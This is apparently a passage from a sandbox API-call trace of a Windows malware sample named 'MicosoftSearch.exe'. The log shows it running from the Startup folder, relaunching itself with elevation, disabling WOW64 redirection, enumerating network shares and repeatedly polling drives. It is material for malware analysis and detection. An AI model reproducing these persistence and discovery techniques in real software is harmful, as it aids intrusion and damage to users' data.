th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0276.833] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0276.833] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0276.834] lstrlenW (lpString="reader_sl.exe") returned 13 [0276.834] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0276.834] CloseHandle (hObject=0x210) returned 1 [0276.834] Sleep (dwMilliseconds=0x1f4) Thread: id = 50 os_tid = 0x5d4 [0240.262] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9dc70 [0240.262] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0xba86d0 [0240.263] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9dca0 [0240.263] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9dca0, Size=0x20) returned 0xb84510 [0240.263] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9dca0 [0240.263] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9dca0, Size=0x20) returned 0xb84538 [0240.263] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0240.263] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0240.263] Wow64DisableWow64FsRedirection (in: OldValue=0x241ff28 | out: OldValue=0x241ff28*=0x0) returned 1 [0240.263] lstrlenW (lpString="kernel32.dll") returned 12 [0240.263] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb84510 | out: hHeap=0xb00000) returned 1 [0240.263] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0240.263] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb84538 | out: hHeap=0xb00000) returned 1 [0240.264] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xba86d0, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\micosoftsearch.exe")) returned 0x6e [0240.264] ShellExecuteExW (pExecInfo=0x241ff34*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe", lpParameters="-a", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) Thread: id = 51 os_tid = 0x5d8 [0240.266] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9dce8 [0240.266] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9dce8, Size=0x20) returned 0xb84538 [0240.266] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb84538, Size=0x40) returned 0xb82ab8 [0240.266] GetLogicalDrives () returned 0x4 [0240.266] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0xbdbee8 [0240.266] GetComputerNameW (in: lpBuffer=0xbdbeec, nSize=0x259ff6c | out: lpBuffer="XDUWTFONO", nSize=0x259ff6c) returned 1 [0240.266] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x1000) returned 0xba45f8 [0240.266] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x259ff3c | out: lphEnum=0x259ff3c*=0xb83bc0) returned 0x0 [0240.266] WNetEnumResourceW (in: hEnum=0xb83bc0, lpcCount=0x259ff38, lpBuffer=0xba45f8, lpBufferSize=0x259ff40 | out: lpcCount=0x259ff38, lpBuffer=0xba45f8, lpBufferSize=0x259ff40) returned 0x103 [0240.266] WNetCloseEnum (hEnum=0xb83bc0) returned 0x0 [0240.267] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x259ff3c | out: lphEnum=0x259ff3c*=0xba65e8) returned 0x0 [0241.351] WNetEnumResourceW (in: hEnum=0xba65e8, lpcCount=0x259ff38, lpBuffer=0xba45f8, lpBufferSize=0x259ff40 | out: lpcCount=0x259ff38, lpBuffer=0xba45f8, lpBufferSize=0x259ff40) returned 0x0 [0241.351] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x1000) returned 0xbbc6d8 [0241.351] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xba45f8, lphEnum=0x259ff10 | out: lphEnum=0x259ff10*=0x3debdd8) returned 0x0 [0241.557] WNetEnumResourceW (in: hEnum=0x3debdd8, lpcCount=0x259ff0c, lpBuffer=0xbbc6d8, lpBufferSize=0x259ff14 | out: lpcCount=0x259ff0c, lpBuffer=0xbbc6d8, lpBufferSize=0x259ff14) returned 0x103 [0241.558] WNetCloseEnum (hEnum=0x3debdd8) returned 0x0 [0241.558] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x1000) returned 0x47720a8 [0241.558] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xba4618, lphEnum=0x259ff10 | out: lphEnum=0x259ff10*=0x0) returned 0xaa [0242.040] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x1000) returned 0x47f8110 [0242.040] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xba4638, lphEnum=0x259ff10 | out: lphEnum=0x259ff10*=0x0) returned 0x4c6 [0242.041] WNetEnumResourceW (in: hEnum=0xba65e8, lpcCount=0x259ff38, lpBuffer=0xba45f8, lpBufferSize=0x259ff40 | out: lpcCount=0x259ff38, lpBuffer=0xba45f8, lpBufferSize=0x259ff40) returned 0x103 [0242.041] WNetCloseEnum (hEnum=0xba65e8) returned 0x0 [0242.041] GetLogicalDrives () returned 0x4 [0242.041] Sleep (dwMilliseconds=0x64) [0242.288] GetLogicalDrives () returned 0x4 [0242.288] Sleep (dwMilliseconds=0x64) [0242.531] GetLogicalDrives () returned 0x4 [0242.531] Sleep (dwMilliseconds=0x64) [0242.681] GetLogicalDrives () returned 0x4 [0242.681] Sleep (dwMilliseconds=0x64) [0243.008] GetLogicalDrives () returned 0x4 [0243.008] Sleep (dwMilliseconds=0x64) [0243.285] GetLogicalDrives () returned 0x4 [0243.285] Sleep (dwMilliseconds=0x64) [0243.407] GetLogicalDrives () returned 0x4 [0243.407] Sleep (dwMilliseconds=0x64) [0243.979] GetLogicalDrives () returned 0x4 [0243.979] Sleep (dwMilliseconds=0x64) [0244.574] GetLogicalDrives () returned 0x4 [0244.574] Sleep (dwMilliseconds=0x64) [0245.024] GetLogicalDrives () returned 0x4 [0245.024] Sleep (dwMilliseconds=0x64) [0245.308] GetLogicalDrives () returned 0x4 [0245.308] Sleep (dwMilliseconds=0x64) [0245.419] GetLogicalDrives () returned 0x4 [0245.419] Sleep (dwMilliseconds=0x64) [0245.662] GetLogicalDrives () returned 0x4 [0245.662] Sleep (dwMilliseconds=0x64) [0246.001] GetLogicalDrives () returned 0x4 [0246.001] Sleep (dwMilliseconds=0x64) [0246.295] GetLogicalDrives () returned 0x4 [0246.295] Sleep (dwMilliseconds=0x64) [0246.447] GetLogicalDrives () returned 0x4 [0246.447] Sleep (dwMilliseconds=0x64) [0246.602] GetLogicalDrives () returned 0x4 [0246.602] Sleep (dwMilliseconds=0x64) [0246.800] GetLogicalDrives () returned 0x4 [0246.800] Sleep (dwMilliseconds=0x64) [0246.933] GetLogicalDrives () returned 0x4 [0246.933] Sleep (dwMilliseconds=0x64) [0247.064] GetLogicalDrives () returned 0x4 [0247.064] Sleep (dwMilliseconds=0x64) [0247.180] GetLogicalDrives () returned 0x4 [0247.180] Sleep (dwMilliseconds=0x64) [0247.311] GetLogicalDrives () returned 0x4 [0247.311] Sleep (dwMilliseconds=0x64) [0247.526] GetLogicalDrives () returned 0x4 [0247.526] Sleep (dwMilliseconds=0x64) [0248.319] GetLogicalDrives () returned 0x4 [0248.319] Sleep (dwMilliseconds=0x64) [0248.437] GetLogicalDrives () returned 0x4 [0248.437] Sleep (dwMilliseconds=0x64) [0248.750] GetLogicalDrives () returned 0x4 [0248.750] Sleep (dwMilliseconds=0x64) [0249.044] GetLogicalDrives () returned 0x4 [0249.044] Sleep (dwMilliseconds=0x64) [0249.241] GetLogicalDrives () returned 0x4 [0249.241] Sleep (dwMilliseconds=0x64) [0249.463] GetLogicalDrives () returned 0x4 [0249.463] Sleep (dwMilliseconds=0x64) [0249.659] GetLogicalDrives () returned 0x4 [0249.659] Sleep (dwMilliseconds=0x64) [0249.956] GetLogicalDrives () returned 0x4 [0249.956] Sleep (dwMilliseconds=0x64) [0250.147] GetLogicalDrives () returned 0x4 [0250.147] Sleep (dwMilliseconds=0x64) [0250.749] GetLogicalDrives () returned 0x4 [0250.749] Sleep (dwMilliseconds=0x64) [0250.868] GetLogicalDrives () returned 0x4 [0250.868] Sleep (dwMilliseconds=0x64) [0251.024] GetLogicalDrives () returned 0x4 [0251.024] Sleep (dwMilliseconds=0x64) [0251.176] GetLogicalDrives () returned 0x4 [0251.176] Sleep (dwMilliseconds=0x64) [0251.291] GetLogicalDrives () returned 0x4 [0251.291] Sleep (dwMilliseconds=0x64) [0251.496] GetLogicalDrives () returned 0x4 [0251.496] Sleep (dwMilliseconds=0x64) [0251.607] GetLogicalDrives () returned 0x4 [0251.607] Sleep (dwMilliseconds=0x64) [0251.849] GetLogicalDrives () returned 0x4 [0251.849] Sleep (dwMilliseconds=0x64) [0252.046] GetLogicalDrives () returned 0x4 [0252.046] Sleep (dwMilliseconds=0x64) [0252.493] GetLogicalDrives () returned 0x4 [0252.493] Sleep (dwMilliseconds=0x64) [0252.813] GetLogicalDrives () returned 0x4 [0252.813] Sleep (dwMilliseconds=0x64) [0252.933] GetLogicalDrives () returned 0x4 [0252.933] Sleep (dwMilliseconds=0x64) [0253.114] GetLogicalDrives () returned 0x4 [0253.114] Sleep (dwMilliseconds=0x64) [0253.364] GetLogicalDrives () returned 0x4 [0253.364] Sleep (dwMilliseconds=0x64) [0253.610] GetLogicalDrives () returned 0x4 [0253.610] Sleep (dwMilliseconds=0x64) [0254.048] GetLogicalDrives () returned 0x4 [0254.048] Sleep (dwMilliseconds=0x64) [0254.460] GetLogicalDrives () returned 0x4 [0254.460] Sleep (dwMilliseconds=0x64) [0255.381] GetLogicalDrives () returned 0x4 [0255.381] Sleep (dwMilliseconds=0x64) [0255.578] GetLogicalDrives () returned 0x4 [0255.578] Sleep (dwMilliseconds=0x64) [0256.050] GetLogicalDrives () returned 0x4 [0256.057] Sleep (dwMilliseconds=0x64) [0256.312] GetLogicalDrives () returned 0x4 [0256.312] Sleep (dwMilliseconds=0x64) [0256.884] GetLogicalDrives () returned 0x4 [0256.884] Sleep (dwMilliseconds=0x64) [0257.008] GetLogicalDrives () returned 0x4 [0257.008] Sleep (dwMilliseconds=0x64) [0257.227] GetLogicalDrives () returned 0x4 [0257.227] Sleep (dwMilliseconds=0x64) [0257.445] GetLogicalDrives () returned 0x4 [0257.445] Sleep (dwMilliseconds=0x64) [0257.883] GetLogicalDrives () returned 0x4 [0257.883] Sleep (dwMilliseconds=0x64) [0258.174] GetLogicalDrives () returned 0x4 [0258.174] Sleep (dwMilliseconds=0x64) [0258.883] GetLogicalDrives () returned 0x4 [0258.883] Sleep (dwMilliseconds=0x64) [0259.140] GetLogicalDrives () returned 0x4 [0259.140] Sleep (dwMilliseconds=0x64) [0259.468] GetLogicalDrives () returned 0x4 [0259.468] Sleep (dwMilliseconds=0x64) [0259.631] GetLogicalDrives () returned 0x4 [0259.631] Sleep (dwMilliseconds=0x64) [0259.917] GetLogicalDrives () returned 0x4 [0259.917] Sleep (dwMilliseconds=0x64) [0260.316] GetLogicalDrives () returned 0x4 [0260.316] Sleep (dwMilliseconds=0x64) [0260.637] GetLogicalDrives () returned 0x4 [0260.637] Sleep (dwMilliseconds=0x64) [0261.695] GetLogicalDrives () returned 0x4 [0261.695] Sleep (dwMilliseconds=0x64) [0261.946] GetLogicalDrives () returned 0x4 [0261.946] Sleep (dwMilliseconds=0x64) [0262.172] GetLogicalDrives () returned 0x4 [0262.172] Sleep (dwMilliseconds=0x64) [0262.904] GetLogicalDrives () returned 0x4 [0262.904] Sleep (dwMilliseconds=0x64) [0263.299] GetLogicalDrives () returned 0x4 [0263.299] Sleep (dwMilliseconds=0x64) [0263.588] GetLogicalDrives () returned 0x4 [0263.588] Sleep (dwMilliseconds=0x64) [0263.887] GetLogicalDrives () returned 0x4 [0263.892] Sleep (dwMilliseconds=0x64) [0264.223] GetLogicalDrives () returned 0x4 [0264.223] Sleep (dwMilliseconds=0x64) [0264.818] GetLogicalDrives () returned 0x4 [0264.818] Sleep (dwMilliseconds=0x64) [0265.094] GetLogicalDrives () returned 0x4 [0265.099] Sleep (dwMilliseconds=0x64) [0265.220] GetLogicalDrives () returned 0x4 [0265.220] Sleep (dwMilliseconds=0x64) [0265.349] GetLogicalDrives () returned 0x4 [0265.349] Sleep (dwMilliseconds=0x64) [0265.575] GetLogicalDrives () returned 0x4 [0265.575] Sleep (dwMilliseconds=0x64) [0265.725] GetLogicalDrives () returned 0x4 [0265.726] Sleep (dwMilliseconds=0x64) [0266.011] GetLogicalDrives () returned 0x4 [0266.011] Sleep (dwMilliseconds=0x64) [0266.211] GetLogicalDrives () returned 0x4 [0266.211] Sleep (dwMilliseconds=0x64) [0266.933] GetLogicalDrives () returned 0x4 [0266.933] Sleep (dwMilliseconds=0x64) [0267.169] GetLogicalDrives () returned 0x4 [0267.169] Sleep (dwMilliseconds=0x64) [0267.332] GetLogicalDrives () returned 0x4 [0267.332] Sleep (dwMilliseconds=0x64) [0267.474] GetLogicalDrives () returned 0x4 [0267.474] Sleep (dwMilliseconds=0x64) [0267.596] GetLogicalDrives () returned 0x4 [0267.596] Sleep (dwMilliseconds=0x64) [0267.870] GetLogicalDrives () returned 0x4 [0267.870] Sleep (dwMilliseconds=0x64) [0268.025] GetLogicalDrives () returned 0x4 [0268.025] Sleep (dwMilliseconds=0x64) [0268.192] GetLogicalDrives () returned 0x4 [0268.192] Sleep (dwMilliseconds=0x64) [0268.587] GetLogicalDrives () returned 0x4 [0268.587] Sleep (dwMilliseconds=0x64) [0268.876] GetLogicalDrives () returned 0x4 [0268.876] Sleep (dwMilliseconds=0x64) [0269.114] GetLogicalDrives () returned 0x4 [0269.115] Sleep (dwMilliseconds=0x64) [0269.366] GetLogicalDrives () returned 0x4 [0269.366] Sleep (dwMilliseconds=0x64) [0269.529] GetLogicalDrives () returned 0x4 [0269.529] Sleep (dwMilliseconds=0x64) [0269.864] GetLogicalDrives () returned 0x4 [0269.864] Sleep (dwMilliseconds=0x64) [0270.072] GetLogicalDrives () returned 0x4 [0270.072] Sleep (dwMilliseconds=0x64) [0270.303] GetLogicalDrives () returned 0x4 [0270.303] Sleep (dwMilliseconds=0x64) [0270.721] GetLogicalDrives () returned 0x4 [0270.721] Sleep (dwMilliseconds=0x64) [0271.114] GetLogicalDrives () returned 0x4 [0271.114] Sleep (dwMilliseconds=0x64) [0271.728] GetLogicalDrives () returned 0x4 [0271.728] Sleep (dwMilliseconds=0x64) [0271.876] GetLogicalDrives () returned 0x4 [0271.876] Sleep (dwMilliseconds=0x64) [0272.033] GetLogicalDrives () returned 0x4 [0272.033] Sleep (dwMilliseconds=0x64) [0272.187] GetLogicalDrives () returned 0x4 [0272.187] Sleep (dwMilliseconds=0x64) [0272.779] GetLogicalDrives () returned 0x4 [0272.779] Sleep (dwMilliseconds=0x64) [0273.363] GetLogicalDrives () returned 0x4 [0273.363] Sleep (dwMilliseconds=0x64) [0273.732] GetLogicalDrives () returned 0x4 [0273.732] Sleep (dwMilliseconds=0x64) [0274.068] GetLogicalDrives () returned 0x4 [0274.069] Sleep (dwMilliseconds=0x64) [0274.501] GetLogicalDrives () returned 0x4 [0274.501] Sleep (dwMilliseconds=0x64) [0275.882] GetLogicalDrives () returned 0x4 [0275.882] Sleep (dwMilliseconds=0x64) [0276.488] GetLogicalDrives () returned 0x4 [0276.489] Sleep (dwMilliseconds=0x64) [0276.816] GetLogicalDrives () returned 0x4 [0276.816] Sleep (dwMilliseconds=0x64) [0277.079] GetLogicalDrives () returned 0x4 [0277.079] Sleep (dwMilliseconds=0x64) Thread: id = 52 os_tid = 0x5dc [0241.107] GetTickCount () returned 0x7251 [0241.107] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x24) returned 0xba0628 [0241.107] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0xba0628, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134 [0241.108] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0xba0628, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13c [0241.317] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0xba0628, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x144 [0241.319] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0xba0628, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x148 [0241.320] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9de50 [0241.320] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9de50, Size=0x20) returned 0xb84650 [0241.320] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9de50 [0241.320] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9de50, Size=0x20) returned 0xb84678 [0241.320] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0241.329] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0241.329] Wow64DisableWow64FsRedirection (in: OldValue=0x2a2ff84 | out: OldValue=0x2a2ff84*=0x0) returned 1 [0241.329] lstrlenW (lpString="kernel32.dll") returned 12 [0241.329] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb84650 | out: hHeap=0xb00000) returned 1 [0241.330] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0241.330] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb84678 | out: hHeap=0xb00000) returned 1 [0241.330] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0xb87aa0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x16c [0241.331] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0241.536] GetTickCount () returned 0x733b [0241.536] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0241.744] GetTickCount () returned 0x7416 [0241.744] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0242.049] GetTickCount () returned 0x753e [0242.049] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0242.288] GetTickCount () returned 0x7628 [0242.288] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0242.531] GetTickCount () returned 0x7712 [0242.531] GetTickCount () returned 0x7712 [0242.531] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0242.682] GetTickCount () returned 0x77ae [0242.682] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0243.008] GetTickCount () returned 0x78f6 [0243.008] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0243.285] GetTickCount () returned 0x7a0f [0243.285] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0243.407] GetTickCount () returned 0x7a7c [0243.407] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0243.978] GetTickCount () returned 0x7cbd [0243.978] GetTickCount () returned 0x7cbd [0243.978] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0244.573] GetTickCount () returned 0x7f0e [0244.573] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0245.024] GetTickCount () returned 0x80d2 [0245.024] GetTickCount () returned 0x80d2 [0245.024] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0245.308] GetTickCount () returned 0x81eb [0245.308] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0245.419] GetTickCount () returned 0x8258 [0245.419] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0245.662] GetTickCount () returned 0x8352 [0245.662] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0246.001] GetTickCount () returned 0x84a9 [0246.001] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0246.295] GetTickCount () returned 0x85d1 [0246.295] GetTickCount () returned 0x85d1 [0246.295] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0246.448] GetTickCount () returned 0x865e [0246.448] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0246.602] GetTickCount () returned 0x86fa [0246.602] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0246.800] GetTickCount () returned 0x87c5 [0246.800] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0246.933] GetTickCount () returned 0x8841 [0246.933] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0247.064] GetTickCount () returned 0x88ce [0247.064] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0247.180] GetTickCount () returned 0x894b [0247.180] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0247.311] GetTickCount () returned 0x89c7 [0247.311] GetTickCount () returned 0x89c7 [0247.311] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0247.526] GetTickCount () returned 0x8aa2 [0247.526] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0248.319] GetTickCount () returned 0x8d9e [0248.319] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0248.437] GetTickCount () returned 0x8e1b [0248.437] GetTickCount () returned 0x8e1b [0248.437] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0248.751] GetTickCount () returned 0x8f43 [0248.751] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0249.044] GetTickCount () returned 0x906c [0249.044] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0249.241] GetTickCount () returned 0x9127 [0249.241] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0249.463] GetTickCount () returned 0x9201 [0249.463] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0249.659] GetTickCount () returned 0x92bd [0249.659] GetTickCount () returned 0x92bd [0249.659] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0249.955] GetTickCount () returned 0x93d5 [0249.955] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0250.146] GetTickCount () returned 0x9491 [0250.146] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0250.749] GetTickCount () returned 0x96e1 [0250.749] GetTickCount () returned 0x96e1 [0250.749] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0250.868] GetTickCount () returned 0x974f [0250.868] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0251.023] GetTickCount () returned 0x97eb [0251.024] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0251.175] GetTickCount () returned 0x9877 [0251.175] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0251.291] GetTickCount () returned 0x98f4 [0251.291] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0251.496] GetTickCount () returned 0x99af [0251.496] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0251.607] GetTickCount () returned 0x9a1c [0251.607] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0251.849] GetTickCount () returned 0x9af7 [0251.849] GetTickCount () returned 0x9af7 [0251.849] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0252.047] GetTickCount () returned 0x9bb2 [0252.047] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0252.493] GetTickCount () returned 0x9d67 [0252.493] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0252.813] GetTickCount () returned 0x9e9f [0252.813] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0252.933] GetTickCount () returned 0x9f0c [0252.933] GetTickCount () returned 0x9f0c [0252.933] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0253.115] GetTickCount () returned 0x9fc7 [0253.115] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0253.364] GetTickCount () returned 0xa0c1 [0253.364] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0253.610] GetTickCount () returned 0xa1ba [0253.610] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0254.048] GetTickCount () returned 0xa36f [0254.048] GetTickCount () returned 0xa36f [0254.048] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0254.460] GetTickCount () returned 0xa505 [0254.460] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0255.381] GetTickCount () returned 0xa89d [0255.381] GetTickCount () returned 0xa89d [0255.381] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0255.578] GetTickCount () returned 0xa968 [0255.578] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0256.062] GetTickCount () returned 0xab4b [0256.062] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0256.312] GetTickCount () returned 0xac45 [0256.312] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0256.884] GetTickCount () returned 0xae77 [0256.884] GetTickCount () returned 0xae77 [0256.884] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0257.008] GetTickCount () returned 0xaef3 [0257.008] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0257.227] GetTickCount () returned 0xafce [0257.227] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0257.445] GetTickCount () returned 0xb0a8 [0257.445] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0257.883] GetTickCount () returned 0xb25d [0257.883] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0258.174] GetTickCount () returned 0xb385 [0258.174] GetTickCount () returned 0xb385 [0258.174] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0258.883] GetTickCount () returned 0xb653 [0258.883] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0259.140] GetTickCount () returned 0xb74d [0259.140] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0259.468] GetTickCount () returned 0xb894 [0259.468] GetTickCount () returned 0xb894 [0259.468] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0259.631] GetTickCount () returned 0xb930 [0259.631] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0259.916] GetTickCount () returned 0xba59 [0259.916] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0260.316] GetTickCount () returned 0xbbdf [0260.316] WaitForSingleObject (hHandle=0x16c, dwMilliseconds=0x64) returned 0x102 [0260.637] GetTickCount () returned 0xbd26 [0260.637] GetTickCount () returned 0xbd26 [0260.637] 